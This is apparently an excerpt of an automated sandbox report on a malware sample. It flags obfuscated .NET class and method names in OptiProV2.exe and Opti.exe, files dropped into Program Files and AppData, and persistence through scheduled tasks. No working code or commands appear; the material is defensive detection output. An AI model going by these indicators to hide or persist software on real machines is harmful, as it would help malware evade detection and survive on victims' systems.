                  Source: OptiProV2.exe.1.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.csHigh entropy of concatenated method names: 'vHl7Mj6Fa0zScOydgAsyWDdTYRhFhYpEDRMG0Ge2hCOHj40MovdBpZHRBj', 'tdaBnLFL8CLUgNYzg3nZ8VJMUNlHf7Okz6AwLYNXfzU2Orlquk2MsKnjS0', '_0HL04J2WKKuryyRcBOlubuNd0G3ZW1EhjrTEaVuyX2XU95XYso0GaH70Us', 'bAEDpCBHXBCcMVDgjrUNa1A2GNtgjpudBuQnlAnHw7qadeFB38KBZU6pXc', 'cECBHygdKVz4xjmssCvuorQKt5r9dZ7fcE3wcF6DBc3sne7O1q8QzUnJyD8uQfLBi21XaxEqLMmTuMlJlFUtdfOjs6', 'wrLLV47XoAO0ZodAtlJW6wFyefZ4h60Rl6pyZwgmF1Gw3zOBqmuvN19kp2sDmXiqFE9f6oVmqfxEsQflX87ljqgWDA', 'yckviTG9P2PvVBdcUTH7TvqS3mBaI9OuBXA9H42pGjKHTQauPooGgeDw93N2Qxd8bbBzBTEyFdn32CIalH0WaV3ml1', 'O5zEl4A3xTTYEB6VnXOfz8rqKOCCoMrgSQQB4Fpz8XFMTiwTlqHK1QKR3LbW4tAMMQQQHpYiT0Ms69bpaydmqLKH9G', 'tXyvvP5yOUhj8PG2qLRKNkUe1WZ9B7NRYaA3MybGjWpe3r8kxPGnJJhgZ7cdocliDznMjgnoZjYnGVTdgCxYNbHrD8', 'ED82coi1ykaCw02vLYo4UNFm0SpyHBd9DEpY5zlbOZ3wEnfoHLYC82Bo5gWMPSGMH9thqEVRrv9xzxKuxgbHiIbbeS'
                  Source: OptiProV2.exe.1.dr, 4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.csHigh entropy of concatenated method names: 'xVlMQDNbZvbVoF6J2slw5ZmJpj6nDySw3', 'lRyTYNvmgINJBpSQ75ROlhhkG3y6Gn5lN', 'dnmHffTf4a6bjhJjIdEcsiRHX1uCMWZ1X', 'RaazLiT9YBLXM7ghKMJkKDcZp7JdSoSRl', 'IhpsDJqViYJ1ZuGqrnh0rYC6Rx1B6LqrW', '_0OaIJHzdjMY90A5qjTNP5p6nLhBXu2KpM', 'iXsMdcHrB89n16eXEjUNVm3jcaR0iwXEA', '_5Huu094pFgSHFW4Gm7Es5rWFxu1zUSFut', 'FS5XDTmwSgVOHwPfARq74OvGIIXgVCpd5', 'hvXtCHxfwqO5xILLfP1EsbzW9YYOa0Nwh'
                  Source: OptiProV2.exe.1.dr, hhV7DOMkmQgYqqbHeGscN0c4LrfQjfaUkdQRPdxty6xIZnZl3upnEI5DMAmZudxB8IALbYSknCkqGL7UOcXisb5uzW.csHigh entropy of concatenated method names: 'qu5lKOfPxxv1fjgPFKMG72HhexVoHL2dm3JE8coLUcUja31T2gl1D2CUDPkSyiVRuB2auAkkYXu7g01o2XTyyB9Xun', '_1qZmgo8PsC4Vz3oDNGKV7i29aPlOoatPoje3cH1b7rlpGvhBj9q7NiXwQJNjIsBZKKEJ9Yp9HHoUz49vHMxL1GeD1Z', 'jOCBrijKPEGzaa5WIbbbQMEJop6qjEoaw', 'TFX94gCK3VrHs0HZz4d2YoOf5VlMbpvVu', 'z0a8shr4BzRd9guDxD', '_9mrIIAHAvl4la2vn7D', '_3XZHFML52Fxc0bALFe', 'XWo75dQS7tyUKHIPfZ', 'CzOZNpyRBMl4G3n4Ma', '_6NKeb2aMYh9KjOnilt'
                  Source: OptiProV2.exe.1.dr, qngCFWvYexWmPPmBbK7CLaJTpZl6E1ZBBL9wbTYcWFuxk0SRRfeGlSTw5p.csHigh entropy of concatenated method names: 't1WAOwJHKFgQbUT1hg4daqW6drdWs7jSJ7NWziBx91l2v2txHQmHSQxkuz', 'SS0Ib40pTqM2S6rPaQ2VNthCrriVdfdZVfAGYPPfYUnDdSLKttmOezz9D5', 'rQWiUZgyj4Az9WObEbX2Ch129PFiwfZNyhyH34uI6yyUd6vfWJGi3MjcK6', 'LLD7Kt8DiYra31tPdt3pskQMZI1bZJhAX87tOmJKgLfJYbmtAGafwGtfqy', 'nAttgCITLiy9I5j1OaWmtD43lUAxphMXygIOeEZjA1dyN6FHO06O8uchhG', 'Z7tbLr8FwcSfmzRxvidsfMsgYwmhZNxXo76GXsiGHToslmVMKhmekNvAOo', 's1ST1PmRLGIwhotrovYGvb3CSZa6ya0Kb1Vz4W0kh42o2u3bzaYy7YvPU4', 'PUCQD8miTuJh1oeFeNE49obsNeChG8wTt3AwrjzBKdpYgNniUwOmRLmQUO', 'c4LuJsvm8hAIemGYrcy3MCvD5BZbjXO0AvqL0dZoSRxlncK73T0xu3Go9s', 'JqLVjY0dgD7NguHJAMxFox46oXRs069cCIyDbd3j3IMJIQrMtWPTCgLXja'
                  Source: OptiProV2.exe.1.dr, jyiUFrEBS1h4c5CMzIwWebjIAGYgV64cQMCFQbSmrorXmYfEjANuPgRW8a0VkrHX9DWWCJWunMa5Ah8OqI14ZEVw57.csHigh entropy of concatenated method names: '_0hyWFYuztn2As85udxDNv0rFvjhJ5RxUYXGNXtdV90IX31sgDcMB5wyBHUv9jS3fGrPmYxWPohkwTEEPFL48xcWPCv', 'ul4oFdMmZTF2edqCLkTSaHWOaXfT0Jra0', 'J93xoPFuUgXZiz282trgJXyvPvT2qn8Cm', 'Q7oPLUgNPsakS3AsDZ1B8uSn0yErg9rKB', 'J0SVv0Ikg1T6miqpZ5kJheXDwOgLXZrJn'
                  Source: OptiProV2.exe.1.dr, 3UOG8fK4Jp9QCz33xwQzRGWAHWUuSmd53ky7DfkP2t2ZfoERDgLSkkQBJsVBHA0K2HlfCklpkLrMIZk2vJjhNons22.csHigh entropy of concatenated method names: 'XOn13JcIDvd25EKanLXz7JUxAZMGB3VKO5CdhwttZxdtFVYpItP1fisNe6MtY3wEOATZnOueleiGGVuFzFp6aRvEjq', 'lfAZGrCuw9P8WpVxigJeOtkn1zAH6pjdtxNwX0l86smSDkZVgUR4aPQLZnFWiQY6KNC7I2yBWgTq7dsTmEqlBQNRkN', 'tv6VWTj7jxgQe3y5VMRGLm5RHzVIN3tDbMkBqUFCTwFcX7WTtVyZwXMmP5P8mFvBpRJNFev4WknJusGpiXKXGrKMyC', 'BGnKnbJQgX9LfvoRQ1sHEn8e12AAcjgDDcLEOMR5zql2BUuSJaK1S3EUv4mBTTtK0o29gh3ix6YIG22Y3vMfeP8z6F', 'K69j2nrpASamtuRJVJ1yffdpvI5BMBDp12vVZ0pG1Jgs2FHsOkvMC2QRfHdZcIhahKXTfj8IRyNnqmebaYM8ke1OxI', 'wicScPKjH9f53uU8h1QsA16A27oH8hAZ46E3uvVr3cfyLgcbn1TRP4gBKDkYh3MqXYNKiexJujBnaGSj4UgK4upqNA', 'UIoZv8ZVJxIrnbQc3ml1izZcSa37B5Xd5n6SwlloO4y2DHQGxq5UmgshARBOFP1qlxy2yxGSnUlUzhDhnKaaQBIMzv', 'rCHDWCWJgejffiSnDhPvVHHPXTrFOgVlFmeLU87Zfp0nDc6QGRTB3ezpUxyIaQuJORP0aYc8wOAfR9xj7VxwFku0Uy', '_6XaZJsgM4HehmfuphYD4cvRqUBSeZnep1ya3j2xVLbQYYAOb0e8jccxgm8nL0Obw1uvo1dDhRfX7UhZ0Ee5k0WkY3Z', 'sObFs3ZqGy9oGPsnmO4HUf2NwgYveiBhDFAI3OqNDTLN94FdDzuqLc2Fhd134JuQm2Yr0RSjaOA93A5r9dot7TbFRR'
                  Source: OptiProV2.exe.1.dr, vnqbrMBzOYgaGYLvbUpNVA8hTbJaevZsjqZEb2aQSkfUjd2RKNEC3VxKzS.csHigh entropy of concatenated method names: 't9iQi907RKKEN1uZqidetKOdvkQk3bw2ominDz03H3Q0hRBD0JYtIF297I', 'H3sr3BILIptduJZIbrsYBNnhbktwzBcd5dLjT4jjZvJNrKXbMzYsXffK6N', 'BZBwf3KogtMZ68LfYRyRf7D2VCF3k7byGNzg5C7YYOGp2wkPv6wfCP0Lnl', 'WyyexaPt0VxPhp44tnFvGKv15Z25ZYfm5PWcknTlMvLu7mXwtIvrvpYdmw', 'yoR8cVBjn2jgtxm6FUQQ5RViOzcMkBYyCumENPQ1gZFBSJmAKfZG8Nd311', 'TBsECsYdn6fW7A7hshCYQfGypaeDPd5w1', 'tIW3JSkFIG34bRTXdO1il2YuYt3SHbl3W', 'dtDjsEASLu6GMIjd7Ennhr3MVke3CJUOj', 'zvQ4PiicriFYLKQfbqtwZag12v4yscu2V', 'ePK862dnybiTBhgv3KxlydhHlPNECfa1v'
                  Source: Opti.exe.11.dr, daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.csHigh entropy of concatenated method names: 'Du6Wvo3MA37CmW3QujhgdkPl41wosLCAV', 'Gv3PV9RYykbFv1PgWpMZi4XKqiP34EYDI', 'o5ZivuOBJhWvmh92OCHyMdvIKy6eVdvQE', 'NFMywueN1MlSNkf39ZfbPLffHUEIA6Gvm'
                  Source: Opti.exe.11.dr, oYzkRWMQkXeLlHUoXwTOCVgY0rWUj0Ra9.csHigh entropy of concatenated method names: 'rT1Ege8TUbkYaA8swZHIO7Ql8Z6q9emjZ', 'fJospcbl5Hk02iHSpRdUYaInl9Siv3imb', 'MGoPFtkpOv29CytOT4nFqYhWWzhQ6kgq7', 'GWn0jFEN3KxL6MHxkX', 'B8gGArmVKYLKe3U0Ea', '_6e25XUiCZVzXjryT0K', 'sbybPI9gMoGG52CcKE', 'WLioSC7bd03SqgPYJJ', 'sG9J3pnq6zVJ7bi10f', 'BaAXFefGrSTVxtFmvZ'
                  Source: Opti.exe.11.dr, XmZT00CU7TnrVdVKYNQp4CxjUG7n74Z3fORqw1RK9ysxlkR7eLu2JBdKUY.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'S6GEORgNBZkzRHjzOfwmfIstv5oze6bh0', '_49unOERGpuidMWLPd5Wn3mJcRkObpci9g', '_0mqRMMIOjnrmOocUadbpjOD1Mqwuz3fTe', 'JjcpU6yPRHnHDfcgSYTIuOKeVGE924tHp'
                  Source: Opti.exe.11.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.csHigh entropy of concatenated method names: 'vHl7Mj6Fa0zScOydgAsyWDdTYRhFhYpEDRMG0Ge2hCOHj40MovdBpZHRBj', 'tdaBnLFL8CLUgNYzg3nZ8VJMUNlHf7Okz6AwLYNXfzU2Orlquk2MsKnjS0', '_0HL04J2WKKuryyRcBOlubuNd0G3ZW1EhjrTEaVuyX2XU95XYso0GaH70Us', 'bAEDpCBHXBCcMVDgjrUNa1A2GNtgjpudBuQnlAnHw7qadeFB38KBZU6pXc', 'cECBHygdKVz4xjmssCvuorQKt5r9dZ7fcE3wcF6DBc3sne7O1q8QzUnJyD8uQfLBi21XaxEqLMmTuMlJlFUtdfOjs6', 'wrLLV47XoAO0ZodAtlJW6wFyefZ4h60Rl6pyZwgmF1Gw3zOBqmuvN19kp2sDmXiqFE9f6oVmqfxEsQflX87ljqgWDA', 'yckviTG9P2PvVBdcUTH7TvqS3mBaI9OuBXA9H42pGjKHTQauPooGgeDw93N2Qxd8bbBzBTEyFdn32CIalH0WaV3ml1', 'O5zEl4A3xTTYEB6VnXOfz8rqKOCCoMrgSQQB4Fpz8XFMTiwTlqHK1QKR3LbW4tAMMQQQHpYiT0Ms69bpaydmqLKH9G', 'tXyvvP5yOUhj8PG2qLRKNkUe1WZ9B7NRYaA3MybGjWpe3r8kxPGnJJhgZ7cdocliDznMjgnoZjYnGVTdgCxYNbHrD8', 'ED82coi1ykaCw02vLYo4UNFm0SpyHBd9DEpY5zlbOZ3wEnfoHLYC82Bo5gWMPSGMH9thqEVRrv9xzxKuxgbHiIbbeS'
                  Source: Opti.exe.11.dr, 4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.csHigh entropy of concatenated method names: 'xVlMQDNbZvbVoF6J2slw5ZmJpj6nDySw3', 'lRyTYNvmgINJBpSQ75ROlhhkG3y6Gn5lN', 'dnmHffTf4a6bjhJjIdEcsiRHX1uCMWZ1X', 'RaazLiT9YBLXM7ghKMJkKDcZp7JdSoSRl', 'IhpsDJqViYJ1ZuGqrnh0rYC6Rx1B6LqrW', '_0OaIJHzdjMY90A5qjTNP5p6nLhBXu2KpM', 'iXsMdcHrB89n16eXEjUNVm3jcaR0iwXEA', '_5Huu094pFgSHFW4Gm7Es5rWFxu1zUSFut', 'FS5XDTmwSgVOHwPfARq74OvGIIXgVCpd5', 'hvXtCHxfwqO5xILLfP1EsbzW9YYOa0Nwh'
                  Source: Opti.exe.11.dr, hhV7DOMkmQgYqqbHeGscN0c4LrfQjfaUkdQRPdxty6xIZnZl3upnEI5DMAmZudxB8IALbYSknCkqGL7UOcXisb5uzW.csHigh entropy of concatenated method names: 'qu5lKOfPxxv1fjgPFKMG72HhexVoHL2dm3JE8coLUcUja31T2gl1D2CUDPkSyiVRuB2auAkkYXu7g01o2XTyyB9Xun', '_1qZmgo8PsC4Vz3oDNGKV7i29aPlOoatPoje3cH1b7rlpGvhBj9q7NiXwQJNjIsBZKKEJ9Yp9HHoUz49vHMxL1GeD1Z', 'jOCBrijKPEGzaa5WIbbbQMEJop6qjEoaw', 'TFX94gCK3VrHs0HZz4d2YoOf5VlMbpvVu', 'z0a8shr4BzRd9guDxD', '_9mrIIAHAvl4la2vn7D', '_3XZHFML52Fxc0bALFe', 'XWo75dQS7tyUKHIPfZ', 'CzOZNpyRBMl4G3n4Ma', '_6NKeb2aMYh9KjOnilt'
                  Source: Opti.exe.11.dr, qngCFWvYexWmPPmBbK7CLaJTpZl6E1ZBBL9wbTYcWFuxk0SRRfeGlSTw5p.csHigh entropy of concatenated method names: 't1WAOwJHKFgQbUT1hg4daqW6drdWs7jSJ7NWziBx91l2v2txHQmHSQxkuz', 'SS0Ib40pTqM2S6rPaQ2VNthCrriVdfdZVfAGYPPfYUnDdSLKttmOezz9D5', 'rQWiUZgyj4Az9WObEbX2Ch129PFiwfZNyhyH34uI6yyUd6vfWJGi3MjcK6', 'LLD7Kt8DiYra31tPdt3pskQMZI1bZJhAX87tOmJKgLfJYbmtAGafwGtfqy', 'nAttgCITLiy9I5j1OaWmtD43lUAxphMXygIOeEZjA1dyN6FHO06O8uchhG', 'Z7tbLr8FwcSfmzRxvidsfMsgYwmhZNxXo76GXsiGHToslmVMKhmekNvAOo', 's1ST1PmRLGIwhotrovYGvb3CSZa6ya0Kb1Vz4W0kh42o2u3bzaYy7YvPU4', 'PUCQD8miTuJh1oeFeNE49obsNeChG8wTt3AwrjzBKdpYgNniUwOmRLmQUO', 'c4LuJsvm8hAIemGYrcy3MCvD5BZbjXO0AvqL0dZoSRxlncK73T0xu3Go9s', 'JqLVjY0dgD7NguHJAMxFox46oXRs069cCIyDbd3j3IMJIQrMtWPTCgLXja'
                  Source: Opti.exe.11.dr, jyiUFrEBS1h4c5CMzIwWebjIAGYgV64cQMCFQbSmrorXmYfEjANuPgRW8a0VkrHX9DWWCJWunMa5Ah8OqI14ZEVw57.csHigh entropy of concatenated method names: '_0hyWFYuztn2As85udxDNv0rFvjhJ5RxUYXGNXtdV90IX31sgDcMB5wyBHUv9jS3fGrPmYxWPohkwTEEPFL48xcWPCv', 'ul4oFdMmZTF2edqCLkTSaHWOaXfT0Jra0', 'J93xoPFuUgXZiz282trgJXyvPvT2qn8Cm', 'Q7oPLUgNPsakS3AsDZ1B8uSn0yErg9rKB', 'J0SVv0Ikg1T6miqpZ5kJheXDwOgLXZrJn'
                  Source: Opti.exe.11.dr, 3UOG8fK4Jp9QCz33xwQzRGWAHWUuSmd53ky7DfkP2t2ZfoERDgLSkkQBJsVBHA0K2HlfCklpkLrMIZk2vJjhNons22.csHigh entropy of concatenated method names: 'XOn13JcIDvd25EKanLXz7JUxAZMGB3VKO5CdhwttZxdtFVYpItP1fisNe6MtY3wEOATZnOueleiGGVuFzFp6aRvEjq', 'lfAZGrCuw9P8WpVxigJeOtkn1zAH6pjdtxNwX0l86smSDkZVgUR4aPQLZnFWiQY6KNC7I2yBWgTq7dsTmEqlBQNRkN', 'tv6VWTj7jxgQe3y5VMRGLm5RHzVIN3tDbMkBqUFCTwFcX7WTtVyZwXMmP5P8mFvBpRJNFev4WknJusGpiXKXGrKMyC', 'BGnKnbJQgX9LfvoRQ1sHEn8e12AAcjgDDcLEOMR5zql2BUuSJaK1S3EUv4mBTTtK0o29gh3ix6YIG22Y3vMfeP8z6F', 'K69j2nrpASamtuRJVJ1yffdpvI5BMBDp12vVZ0pG1Jgs2FHsOkvMC2QRfHdZcIhahKXTfj8IRyNnqmebaYM8ke1OxI', 'wicScPKjH9f53uU8h1QsA16A27oH8hAZ46E3uvVr3cfyLgcbn1TRP4gBKDkYh3MqXYNKiexJujBnaGSj4UgK4upqNA', 'UIoZv8ZVJxIrnbQc3ml1izZcSa37B5Xd5n6SwlloO4y2DHQGxq5UmgshARBOFP1qlxy2yxGSnUlUzhDhnKaaQBIMzv', 'rCHDWCWJgejffiSnDhPvVHHPXTrFOgVlFmeLU87Zfp0nDc6QGRTB3ezpUxyIaQuJORP0aYc8wOAfR9xj7VxwFku0Uy', '_6XaZJsgM4HehmfuphYD4cvRqUBSeZnep1ya3j2xVLbQYYAOb0e8jccxgm8nL0Obw1uvo1dDhRfX7UhZ0Ee5k0WkY3Z', 'sObFs3ZqGy9oGPsnmO4HUf2NwgYveiBhDFAI3OqNDTLN94FdDzuqLc2Fhd134JuQm2Yr0RSjaOA93A5r9dot7TbFRR'
                  Source: Opti.exe.11.dr, vnqbrMBzOYgaGYLvbUpNVA8hTbJaevZsjqZEb2aQSkfUjd2RKNEC3VxKzS.csHigh entropy of concatenated method names: 't9iQi907RKKEN1uZqidetKOdvkQk3bw2ominDz03H3Q0hRBD0JYtIF297I', 'H3sr3BILIptduJZIbrsYBNnhbktwzBcd5dLjT4jjZvJNrKXbMzYsXffK6N', 'BZBwf3KogtMZ68LfYRyRf7D2VCF3k7byGNzg5C7YYOGp2wkPv6wfCP0Lnl', 'WyyexaPt0VxPhp44tnFvGKv15Z25ZYfm5PWcknTlMvLu7mXwtIvrvpYdmw', 'yoR8cVBjn2jgtxm6FUQQ5RViOzcMkBYyCumENPQ1gZFBSJmAKfZG8Nd311', 'TBsECsYdn6fW7A7hshCYQfGypaeDPd5w1', 'tIW3JSkFIG34bRTXdO1il2YuYt3SHbl3W', 'dtDjsEASLu6GMIjd7Ennhr3MVke3CJUOj', 'zvQ4PiicriFYLKQfbqtwZag12v4yscu2V', 'ePK862dnybiTBhgv3KxlydhHlPNECfa1v'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.csHigh entropy of concatenated method names: 'Du6Wvo3MA37CmW3QujhgdkPl41wosLCAV', 'Gv3PV9RYykbFv1PgWpMZi4XKqiP34EYDI', 'o5ZivuOBJhWvmh92OCHyMdvIKy6eVdvQE', 'NFMywueN1MlSNkf39ZfbPLffHUEIA6Gvm'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, oYzkRWMQkXeLlHUoXwTOCVgY0rWUj0Ra9.csHigh entropy of concatenated method names: 'rT1Ege8TUbkYaA8swZHIO7Ql8Z6q9emjZ', 'fJospcbl5Hk02iHSpRdUYaInl9Siv3imb', 'MGoPFtkpOv29CytOT4nFqYhWWzhQ6kgq7', 'GWn0jFEN3KxL6MHxkX', 'B8gGArmVKYLKe3U0Ea', '_6e25XUiCZVzXjryT0K', 'sbybPI9gMoGG52CcKE', 'WLioSC7bd03SqgPYJJ', 'sG9J3pnq6zVJ7bi10f', 'BaAXFefGrSTVxtFmvZ'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, XmZT00CU7TnrVdVKYNQp4CxjUG7n74Z3fORqw1RK9ysxlkR7eLu2JBdKUY.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'S6GEORgNBZkzRHjzOfwmfIstv5oze6bh0', '_49unOERGpuidMWLPd5Wn3mJcRkObpci9g', '_0mqRMMIOjnrmOocUadbpjOD1Mqwuz3fTe', 'JjcpU6yPRHnHDfcgSYTIuOKeVGE924tHp'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.csHigh entropy of concatenated method names: 'vHl7Mj6Fa0zScOydgAsyWDdTYRhFhYpEDRMG0Ge2hCOHj40MovdBpZHRBj', 'tdaBnLFL8CLUgNYzg3nZ8VJMUNlHf7Okz6AwLYNXfzU2Orlquk2MsKnjS0', '_0HL04J2WKKuryyRcBOlubuNd0G3ZW1EhjrTEaVuyX2XU95XYso0GaH70Us', 'bAEDpCBHXBCcMVDgjrUNa1A2GNtgjpudBuQnlAnHw7qadeFB38KBZU6pXc', 'cECBHygdKVz4xjmssCvuorQKt5r9dZ7fcE3wcF6DBc3sne7O1q8QzUnJyD8uQfLBi21XaxEqLMmTuMlJlFUtdfOjs6', 'wrLLV47XoAO0ZodAtlJW6wFyefZ4h60Rl6pyZwgmF1Gw3zOBqmuvN19kp2sDmXiqFE9f6oVmqfxEsQflX87ljqgWDA', 'yckviTG9P2PvVBdcUTH7TvqS3mBaI9OuBXA9H42pGjKHTQauPooGgeDw93N2Qxd8bbBzBTEyFdn32CIalH0WaV3ml1', 'O5zEl4A3xTTYEB6VnXOfz8rqKOCCoMrgSQQB4Fpz8XFMTiwTlqHK1QKR3LbW4tAMMQQQHpYiT0Ms69bpaydmqLKH9G', 'tXyvvP5yOUhj8PG2qLRKNkUe1WZ9B7NRYaA3MybGjWpe3r8kxPGnJJhgZ7cdocliDznMjgnoZjYnGVTdgCxYNbHrD8', 'ED82coi1ykaCw02vLYo4UNFm0SpyHBd9DEpY5zlbOZ3wEnfoHLYC82Bo5gWMPSGMH9thqEVRrv9xzxKuxgbHiIbbeS'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, 4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.csHigh entropy of concatenated method names: 'xVlMQDNbZvbVoF6J2slw5ZmJpj6nDySw3', 'lRyTYNvmgINJBpSQ75ROlhhkG3y6Gn5lN', 'dnmHffTf4a6bjhJjIdEcsiRHX1uCMWZ1X', 'RaazLiT9YBLXM7ghKMJkKDcZp7JdSoSRl', 'IhpsDJqViYJ1ZuGqrnh0rYC6Rx1B6LqrW', '_0OaIJHzdjMY90A5qjTNP5p6nLhBXu2KpM', 'iXsMdcHrB89n16eXEjUNVm3jcaR0iwXEA', '_5Huu094pFgSHFW4Gm7Es5rWFxu1zUSFut', 'FS5XDTmwSgVOHwPfARq74OvGIIXgVCpd5', 'hvXtCHxfwqO5xILLfP1EsbzW9YYOa0Nwh'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, hhV7DOMkmQgYqqbHeGscN0c4LrfQjfaUkdQRPdxty6xIZnZl3upnEI5DMAmZudxB8IALbYSknCkqGL7UOcXisb5uzW.csHigh entropy of concatenated method names: 'qu5lKOfPxxv1fjgPFKMG72HhexVoHL2dm3JE8coLUcUja31T2gl1D2CUDPkSyiVRuB2auAkkYXu7g01o2XTyyB9Xun', '_1qZmgo8PsC4Vz3oDNGKV7i29aPlOoatPoje3cH1b7rlpGvhBj9q7NiXwQJNjIsBZKKEJ9Yp9HHoUz49vHMxL1GeD1Z', 'jOCBrijKPEGzaa5WIbbbQMEJop6qjEoaw', 'TFX94gCK3VrHs0HZz4d2YoOf5VlMbpvVu', 'z0a8shr4BzRd9guDxD', '_9mrIIAHAvl4la2vn7D', '_3XZHFML52Fxc0bALFe', 'XWo75dQS7tyUKHIPfZ', 'CzOZNpyRBMl4G3n4Ma', '_6NKeb2aMYh9KjOnilt'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, qngCFWvYexWmPPmBbK7CLaJTpZl6E1ZBBL9wbTYcWFuxk0SRRfeGlSTw5p.csHigh entropy of concatenated method names: 't1WAOwJHKFgQbUT1hg4daqW6drdWs7jSJ7NWziBx91l2v2txHQmHSQxkuz', 'SS0Ib40pTqM2S6rPaQ2VNthCrriVdfdZVfAGYPPfYUnDdSLKttmOezz9D5', 'rQWiUZgyj4Az9WObEbX2Ch129PFiwfZNyhyH34uI6yyUd6vfWJGi3MjcK6', 'LLD7Kt8DiYra31tPdt3pskQMZI1bZJhAX87tOmJKgLfJYbmtAGafwGtfqy', 'nAttgCITLiy9I5j1OaWmtD43lUAxphMXygIOeEZjA1dyN6FHO06O8uchhG', 'Z7tbLr8FwcSfmzRxvidsfMsgYwmhZNxXo76GXsiGHToslmVMKhmekNvAOo', 's1ST1PmRLGIwhotrovYGvb3CSZa6ya0Kb1Vz4W0kh42o2u3bzaYy7YvPU4', 'PUCQD8miTuJh1oeFeNE49obsNeChG8wTt3AwrjzBKdpYgNniUwOmRLmQUO', 'c4LuJsvm8hAIemGYrcy3MCvD5BZbjXO0AvqL0dZoSRxlncK73T0xu3Go9s', 'JqLVjY0dgD7NguHJAMxFox46oXRs069cCIyDbd3j3IMJIQrMtWPTCgLXja'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, jyiUFrEBS1h4c5CMzIwWebjIAGYgV64cQMCFQbSmrorXmYfEjANuPgRW8a0VkrHX9DWWCJWunMa5Ah8OqI14ZEVw57.csHigh entropy of concatenated method names: '_0hyWFYuztn2As85udxDNv0rFvjhJ5RxUYXGNXtdV90IX31sgDcMB5wyBHUv9jS3fGrPmYxWPohkwTEEPFL48xcWPCv', 'ul4oFdMmZTF2edqCLkTSaHWOaXfT0Jra0', 'J93xoPFuUgXZiz282trgJXyvPvT2qn8Cm', 'Q7oPLUgNPsakS3AsDZ1B8uSn0yErg9rKB', 'J0SVv0Ikg1T6miqpZ5kJheXDwOgLXZrJn'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, 3UOG8fK4Jp9QCz33xwQzRGWAHWUuSmd53ky7DfkP2t2ZfoERDgLSkkQBJsVBHA0K2HlfCklpkLrMIZk2vJjhNons22.csHigh entropy of concatenated method names: 'XOn13JcIDvd25EKanLXz7JUxAZMGB3VKO5CdhwttZxdtFVYpItP1fisNe6MtY3wEOATZnOueleiGGVuFzFp6aRvEjq', 'lfAZGrCuw9P8WpVxigJeOtkn1zAH6pjdtxNwX0l86smSDkZVgUR4aPQLZnFWiQY6KNC7I2yBWgTq7dsTmEqlBQNRkN', 'tv6VWTj7jxgQe3y5VMRGLm5RHzVIN3tDbMkBqUFCTwFcX7WTtVyZwXMmP5P8mFvBpRJNFev4WknJusGpiXKXGrKMyC', 'BGnKnbJQgX9LfvoRQ1sHEn8e12AAcjgDDcLEOMR5zql2BUuSJaK1S3EUv4mBTTtK0o29gh3ix6YIG22Y3vMfeP8z6F', 'K69j2nrpASamtuRJVJ1yffdpvI5BMBDp12vVZ0pG1Jgs2FHsOkvMC2QRfHdZcIhahKXTfj8IRyNnqmebaYM8ke1OxI', 'wicScPKjH9f53uU8h1QsA16A27oH8hAZ46E3uvVr3cfyLgcbn1TRP4gBKDkYh3MqXYNKiexJujBnaGSj4UgK4upqNA', 'UIoZv8ZVJxIrnbQc3ml1izZcSa37B5Xd5n6SwlloO4y2DHQGxq5UmgshARBOFP1qlxy2yxGSnUlUzhDhnKaaQBIMzv', 'rCHDWCWJgejffiSnDhPvVHHPXTrFOgVlFmeLU87Zfp0nDc6QGRTB3ezpUxyIaQuJORP0aYc8wOAfR9xj7VxwFku0Uy', '_6XaZJsgM4HehmfuphYD4cvRqUBSeZnep1ya3j2xVLbQYYAOb0e8jccxgm8nL0Obw1uvo1dDhRfX7UhZ0Ee5k0WkY3Z', 'sObFs3ZqGy9oGPsnmO4HUf2NwgYveiBhDFAI3OqNDTLN94FdDzuqLc2Fhd134JuQm2Yr0RSjaOA93A5r9dot7TbFRR'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, vnqbrMBzOYgaGYLvbUpNVA8hTbJaevZsjqZEb2aQSkfUjd2RKNEC3VxKzS.csHigh entropy of concatenated method names: 't9iQi907RKKEN1uZqidetKOdvkQk3bw2ominDz03H3Q0hRBD0JYtIF297I', 'H3sr3BILIptduJZIbrsYBNnhbktwzBcd5dLjT4jjZvJNrKXbMzYsXffK6N', 'BZBwf3KogtMZ68LfYRyRf7D2VCF3k7byGNzg5C7YYOGp2wkPv6wfCP0Lnl', 'WyyexaPt0VxPhp44tnFvGKv15Z25ZYfm5PWcknTlMvLu7mXwtIvrvpYdmw', 'yoR8cVBjn2jgtxm6FUQQ5RViOzcMkBYyCumENPQ1gZFBSJmAKfZG8Nd311', 'TBsECsYdn6fW7A7hshCYQfGypaeDPd5w1', 'tIW3JSkFIG34bRTXdO1il2YuYt3SHbl3W', 'dtDjsEASLu6GMIjd7Ennhr3MVke3CJUOj', 'zvQ4PiicriFYLKQfbqtwZag12v4yscu2V', 'ePK862dnybiTBhgv3KxlydhHlPNECfa1v'
                  Source: C:\Program Files\Common Files\OptiProV2.exeFile created: C:\Users\user\AppData\Local\Opti.exeJump to dropped file
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeFile created: C:\Program Files\Common Files\OptiProV2.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
